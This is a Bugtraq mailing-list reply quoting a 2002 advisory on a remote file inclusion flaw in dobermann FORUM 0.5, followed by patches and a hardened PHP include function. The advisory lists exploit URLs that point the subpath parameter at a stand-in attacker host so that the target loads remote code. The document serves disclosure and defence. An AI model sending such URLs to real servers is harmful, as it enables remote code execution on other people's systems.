Or place a:

--------------------
<? $subpath = ''; ?>
--------------------

Right above the place where the actual $subpath is being set.

Mark

> -----Original Message-----
> From: Frog Man [mailto:leseulfrog@hotmail.com]
> Sent: Sunday 27 October 2002 P 23:53
> To: bugtraq@securityfocus.com
> Subject: dobermann FORUM (php)
>
>
> Information :
> °°°°°°°°°°°°°°
> Product : dobermann FORUM
> version : 0.5
> website : http://www.le-dobermann.com
> Problem : Include file
>
> PHP Code/location :
> °°°°°°°°°°°°°°°°°°°
> entete.php
> enteteacceuil.php
> topic/entete.php :
> ------------------------------------------
> <?php @include $subpath."banniere.php"; ?>
> ------------------------------------------
>
> index.php
> newtopic.php :
> ------------------------
> @require "config.php";
> @include("entete.php");
> ------------------------
>
> Exploits :
> °°°°°°°°°°
> http://[target]/entete.php?subpath=http://[attacker]/
> http://[target]/enteteacceuil.php?subpath=http://[attacker]/
> http://[target]/topic/entete.php?subpath=http://[attacker]/
> http://[target]/index.php?subpath=http://[attacker]/
> http://[target]/newtopic.php?subpath=http://[attacker]/
> with
> http://[attacker]/banniere.php
>
> Patch :
> °°°°°°°
> In files :
> ------------------
> entete.php
> enteteacceuil.php
> topic/entete.php
> ------------------
> replace the line :
> ------------------------------------------
> <?php @include $subpath."banniere.php"; ?>
> ------------------------------------------
> by :
> ------------------------------------------
> <?php
> $banfile=$subpath."banniere.php";
> if (file_exists($banfile)){
> @include $banfile; }
> ?>
> ------------------------------------------
>
>
>
> More details in French :
> http://www.frog-man.org/tutos/dobermannFORUM.txt
> translated by Google :
> http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
>
> frog-m@n
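A stricter replacement for the vulnerable include line, added here as an illustration and not code from the advisory or from dobermann FORUM itself. It assumes config.php sets $subpath to '' (scripts in the forum root) or '../' (scripts under topic/) and also defines $forum_root as the forum's install directory; the function name resolve_banner() is this example's own.

```php
<?php
// Added example: hardened form of  <?php @include $subpath."banniere.php"; ?>
// Assumptions: config.php has already set $subpath ('' or '../') and
// $forum_root (absolute path of the forum install); both names are ours.
// The advisory's file_exists() patch stops remote URLs, because http://
// does not support stat(), but it still accepts any local path. Mark's
// reply closes the register_globals hole by initialising $subpath before
// config.php assigns it; this function validates the value at point of use.

function resolve_banner($subpath, $forum_root)
{
    // 1. Only the prefixes the forum legitimately uses are accepted, so a
    //    request-supplied http://, php:// or traversal value never reaches
    //    include at all.
    $allowed = array('', '../');
    if (!in_array($subpath, $allowed, true)) {
        return false;
    }

    // 2. Canonicalise the candidate path and confirm it is still inside the
    //    install directory. realpath() returns false if the file is missing.
    $real = realpath(dirname(__FILE__) . '/' . $subpath . 'banniere.php');
    $root = realpath($forum_root);
    if ($real === false || $root === false
        || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $real;
}

$banfile = resolve_banner($subpath, $forum_root);
if ($banfile !== false) {
    include $banfile;
}
?>
```

The allowlist in step 1 is what actually closes the hole; step 2 is a second, independent check that also catches a misconfigured $subpath in config.php.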